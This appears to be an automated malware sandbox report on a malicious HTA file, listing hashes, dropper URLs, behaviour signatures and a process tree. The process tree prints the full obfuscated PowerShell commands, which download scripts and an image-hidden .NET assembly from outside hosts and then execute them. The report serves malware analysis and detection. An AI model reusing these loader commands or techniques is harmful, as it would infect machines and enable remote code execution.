Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    14-11-2024 09:50

General

  • Target

    chakarathingsaregreatpatternwelcomebacktotherealworldbaby.hta

  • Size

    207KB

  • MD5

    9da35c0fa320e4c71bcda752eb4b9cf1

  • SHA1

    1b6b928a3451f86debea42164de4ba8ceceb1fd6

  • SHA256

    819ec71dfdacd69c6fc2c7b495029f637d21018bbd0fcce8af229308bc647043

  • SHA512

    2f1b7631c33838ec2108e0de7e9b4a20d6090b482b8b4a802507387a449d7321447cf7a0a077f5635f2c80ccaa80e68f9762690da2f7c58f6e8932d3b341126c

  • SSDEEP

    96:43F97AobVwb/tbVwbBFLIJd2fqsOSvWn/fn/CAbVwbNbVwbPTbVwbd/Q:43F1JG+LO2aiWn/fn/xq28Q

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\chakarathingsaregreatpatternwelcomebacktotherealworldbaby.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:3068
    • C:\Windows\SysWOW64\wINDoWsPowErSHell\V1.0\POwershelL.eXe
      "C:\Windows\SYStem32\wINDoWsPowErSHell\V1.0\POwershelL.eXe" "POWeRsHeLl.eXE -Ex bYpaSS -NOp -W 1 -C DEVIceCredenTiALDepLOyment ; INvOKE-expReSsion($(INVokE-ExprESsIon('[SYStEM.Text.EnCodINg]'+[CHar]0X3a+[CHaR]58+'uTF8.gEtSTRinG([SYsTem.conVErt]'+[Char]58+[cHaR]0X3A+'fROMbASE64stRinG('+[chAR]0x22+'JFV0WHU1QXF2Vm0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQmVyREVmaW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhc0NhcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExWcFksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFjSFNyY2lZc3EsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWHV2Y1dkUVBiKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaVYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBTd3luRmhJU3pIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRVdFh1NUFxdlZtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjI5LzExMS9zZWVteWJlc3RwYXJ0ZW50aXJld29ybGRmb3JnZXR0aGViZXN0dGhpbmdzZm9ybWUudElGIiwiJEVOdjpBUFBEQVRBXHNlZW15YmVzdHBhcnRlbnRpcmV3b3JsZGZvcmdldHRoZWJlc3R0aGluZ3Nmb3JtLnZiUyIsMCwwKTtzVEFSVC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHBhcnRlbnRpcmV3b3JsZGZvcmdldHRoZWJlc3R0aGluZ3Nmb3JtLnZiUyI='+[CHAr]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2728
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYpaSS -NOp -W 1 -C DEVIceCredenTiALDepLOyment
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2548
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\_2o36g2o.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1296
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF6DE.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF6DD.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1756
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemybestpartentireworldforgetthebestthingsform.vbS"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1924
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaE9NZVs0XSskcFNIT21lWzM0XSsnWCcpICgoKCcwVDZpbWFnZVVybCA9IFdrd2h0dHBzOi8vMTAxNy5maWwnKydlbWFpbC5jb20vYXBpL2ZpbGUvJysnZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZScrJ3UnKyc0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMicrJzA5YzYyYzE3MzA5NDUxNzZhMCcrJzkwNGYgV2t3OzBUNndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFQ2aW1hJysnZ2VCeXRlcyA9IDBUNndlYkNsaWVudC5Eb3dubG9hZCcrJ0RhdGEoMFQ2aW1hZ2VVcmwpOzBUJysnNmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDAnKydUNmltYWdlQnl0ZXMpOzBUNnN0YXJ0RmxhZyA9IFdrdzw8QkFTRTY0X1NUQVJUPj5Xa3c7MFQ2ZW5kRmxhZyA9JysnIFdrdzw8QkFTRTY0XycrJ0VORD4+V2t3OzBUNnN0YXJ0SW5kZXggPSAwVDZpbWFnZVRleHQuSW5kZXhPZigwVDZzdGFydEZsYWcpOzBUNmVuZEluZGV4ID0gMFQ2aW1hZ2VUZXh0LkluZGV4T2YnKycoMFQ2ZW5kRmxhZyk7MFQ2c3RhcnRJbmRleCAtZ2UgMCAtYW5kIDBUNmVuZEluZGV4IC1ndCAwVDZzdGFydEluZGV4OzBUNnN0YXJ0SW5kZXggKz0gMFQ2c3RhcnRGbGEnKydnLkxlbmd0aDswVDZiJysnYXNlNjRMZW5ndGggPSAwVDZlbmRJbicrJ2RleCAtIDBUNnN0YXJ0SW5kZXg7MFQ2YmFzZTY0Q29tbWFuZCA9IDBUNmltYWdlVGV4dC5TdWJzdHJpbmcoMFQ2Jysnc3RhcnRJbmRleCwgMFQ2JysnYmFzZTY0TGVuJysnZ3RoKTswVDZiYXNlNjRSZXZlcnNlZCA9IC1qb2luICgnKycwVDZiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgRzhIIEZvckVhY2gtT2JqZWN0IHsgMFQ2XyB9JysnKVstJysnMS4uLSgwVDZiYXNlNjRDb21tYW5kLkxlbmd0aCldOzBUNmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFQ2YmFzZTY0UmV2ZXJzZWQnKycpOzBUNmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgwVDZjb21tYW5kQnl0ZXMpOzBUNnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoV2t3VkFJV2t3KTswVDZ2YWlNZXRob2QuSW52b2tlKDBUNm51bGwsIEAoV2t3dHh0LkNGRUZEUlcvMTExLzkyLjAyMi4zLjI5MS8vOnB0dGhXa3csIFdrd2Rlc2F0aXZhZG9Xa3csIFdrd2Rlc2F0aXZhZG9Xa3csIFdrd2Rlc2F0aXZhZG9Xa3csIFdrd0Nhc1BvbFdrdywgV2t3ZGVzYXRpdmFkb1drdywgVycrJ2t3ZGVzYXRpdmFkb1drdyxXa3dkZXNhdGl2YWRvV2t3LFdrd2RlJysnc2F0aXZhZG9Xa3csV2t3ZGVzYXRpdmFkb1drdyxXa3dkZXNhdGl2YWRvV2t3LFdrd2Rlc2F0aXZhZG9Xa3csV2t3MScrJ1drdyxXa3dkZXNhJysndGl2YWRvV2t3KSk7JykgIC1DUmVQTGFjZSAgJzBUNicsW2NoYXJdMzYgIC1DUmVQTGFjZSAoW2NoYXJdNzErW2NoYXJdNTYrW2NoYXJdNzIpLFtjaGFyXTEyNCAtUmVQTGFjZSAoW2NoYXJdODcrW2NoYXJdMTA3K1tjaGFyXTExOSksW2NoYXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1440
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShOMe[4]+$pSHOme[34]+'X') ((('0T6imageUrl = Wkwhttps://1017.fil'+'email.com/api/file/'+'get?filekey=2Aa_bWo9Re'+'u'+'45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb2'+'09c62c1730945176a0'+'904f Wkw;0T6webClient = New-Object System.Net.WebClient;0T6ima'+'geBytes = 0T6webClient.Download'+'Data(0T6imageUrl);0T'+'6imageText = [System.Text.Encoding]::UTF8.GetString(0'+'T6imageBytes);0T6startFlag = Wkw<<BASE64_START>>Wkw;0T6endFlag ='+' Wkw<<BASE64_'+'END>>Wkw;0T6startIndex = 0T6imageText.IndexOf(0T6startFlag);0T6endIndex = 0T6imageText.IndexOf'+'(0T6endFlag);0T6startIndex -ge 0 -and 0T6endIndex -gt 0T6startIndex;0T6startIndex += 0T6startFla'+'g.Length;0T6b'+'ase64Length = 0T6endIn'+'dex - 0T6startIndex;0T6base64Command = 0T6imageText.Substring(0T6'+'startIndex, 0T6'+'base64Len'+'gth);0T6base64Reversed = -join ('+'0T6base64Command.ToCharArray() G8H ForEach-Object { 0T6_ }'+')[-'+'1..-(0T6base64Command.Length)];0T6commandBytes = [System.Convert]::FromBase64String(0T6base64Reversed'+');0T6loadedAssembly = [System.Reflection.Assembly]::Load(0T6commandBytes);0T6vaiMethod = [dnlib.IO.Home].GetMethod(WkwVAIWkw);0T6vaiMethod.Invoke(0T6null, @(Wkwtxt.CFEFDRW/111/92.022.3.291//:ptthWkw, WkwdesativadoWkw, WkwdesativadoWkw, WkwdesativadoWkw, WkwCasPolWkw, WkwdesativadoWkw, W'+'kwdesativadoWkw,WkwdesativadoWkw,Wkwde'+'sativadoWkw,WkwdesativadoWkw,WkwdesativadoWkw,WkwdesativadoWkw,Wkw1'+'Wkw,Wkwdesa'+'tivadoWkw));') -CRePLace '0T6',[char]36 -CRePLace ([char]71+[char]56+[char]72),[char]124 -RePLace ([char]87+[char]107+[char]119),[char]39))"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2264

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESF6DE.tmp

    Filesize

    1KB

    MD5

    2f7b4cfe45f04ae20e884d6ab04b69da

    SHA1

    95930304ce1294ec40dbe39c171bb3d3f6a1b8e5

    SHA256

    209adede2c6d589b52b8ebadb0930b109947a35160acd82cf7ada455ce07cbea

    SHA512

    8e95974c2da1bcaf9171154a6f1d9fdb151ef4158f9507bacc325c45daacae7c038143f88d21af815dd24e7d42f0d92dd8b4dfc0f46ccb0f31bd7fa939e97cd8

  • C:\Users\Admin\AppData\Local\Temp\_2o36g2o.dll

    Filesize

    3KB

    MD5

    c042d7d6745a4d7433545089a44c4d6c

    SHA1

    611bcc8d21ca9ed737a8045c0b81b35da3b93b1e

    SHA256

    c27848f62d87f3488f6ece0e29404a24d0b3963807428c4d2d69eccdd69e427d

    SHA512

    0dc45e90bae70e579650e4187bc9d0b8caf3472c60ca9d50ff2a7257cab50edda78453007ba9f00fd4e5ce696349c3cd94ce5ac963ad66e3a275e035edec5c0f

  • C:\Users\Admin\AppData\Local\Temp\_2o36g2o.pdb

    Filesize

    7KB

    MD5

    31422c3e8552c6109bd193fcb5845d5b

    SHA1

    7b7ca1c6b3fae50e5722ae3f3ca3203dc6f1170b

    SHA256

    2b0dd49c9417dc59be38aa2e59ce2493494f4cfcccd70b14f0ac907e98f90dbd

    SHA512

    a5fcb64adfdf2cdc611069ec4c703a06ff94272a36ef0a001d231bebdfd919567121c7a213e154b81fc6778ad1b1de005a786f7f11dc96ebca4ed559db0eea48

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    34359f21ea01ad71303f49c7d7510a2c

    SHA1

    32df7ffe560f8d9d9f48e25f64a6aa59b7655bf5

    SHA256

    11f58c4d5ad32818fa1ca97d0e5a704677a1df96dc937fbd510be22f11a2cfec

    SHA512

    8fd1cd0cb542da1d3618b85dda1994ab70405760fde0bff440bded4c9aebcf946ce3283fb1544ff61dac0de6a05db2188321ad8dd3eb7ce463bd1340549dd2b7

  • C:\Users\Admin\AppData\Roaming\seemybestpartentireworldforgetthebestthingsform.vbS

    Filesize

    139KB

    MD5

    15875d68fa3fc8c1f32f8a8e896b1422

    SHA1

    881419ef4ae4ab06509011805888672145274bdf

    SHA256

    c705ee8032c84d7ab66c725f4b2c44a9f5fb8ab48185ec02892a5901daabb2cb

    SHA512

    bc04a2223e19ec5138c7ff4aa7737886d872f3227e62bb13b3f7e99771e63bf5c4a83fd4bbbb3e0731132383432f68f927c95a10c21810919b3ae7e560ef85fc

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCF6DD.tmp

    Filesize

    652B

    MD5

    5a729e603841be60bbe6b241c4b0860f

    SHA1

    ef91b2254e0b9ed9a4e61ad05f11e3f738754ca0

    SHA256

    565ab756a6c7f0fb012fed5d2173b47470deecb5123f381627c4c182fc8a0790

    SHA512

    a89e3ae9d43e07b36a2c2ebfe70eb7b5b7cf809e0181b08864e6dbccace4e18d9d1c6f0ad033dd6fc4d4aa61c52eb4392771cb665b3b3e588b32bab1109e4ab6

  • \??\c:\Users\Admin\AppData\Local\Temp\_2o36g2o.0.cs

    Filesize

    475B

    MD5

    f1bb7f5885df09739fd258b0e3f4d5d9

    SHA1

    868473888b393910df829d295e76e87f9a50a7b7

    SHA256

    6d613820e0c9db30bd312ccc2ab778c4642c2ea48b8866380cc75dc90550129e

    SHA512

    6ae980681030df55a360368646e80aa8df588eeb771a23ea804890932434255439d5bb5ad17f8fb118e2066d764ef18f510b522bebcf0c3e1fad259d961eb566

  • \??\c:\Users\Admin\AppData\Local\Temp\_2o36g2o.cmdline

    Filesize

    309B

    MD5

    93493c42ef3233906b22a2419d696f81

    SHA1

    49ebc1a7bfa05635ef5845ae93ecc84133a11116

    SHA256

    6678e83db08cf23b7932ab9933661db4ec235b1ed15ff766bbb7a30dd9249bbb

    SHA512

    7cdeb641b2eef88b2b14941a30ec2056f6bdf33036ca6c3a509bcbcc10e7e9ae45f6c812fc1d8b3e72a4478382841c4fb2bf13e4acdf8cdaa3d1c4081e7ce612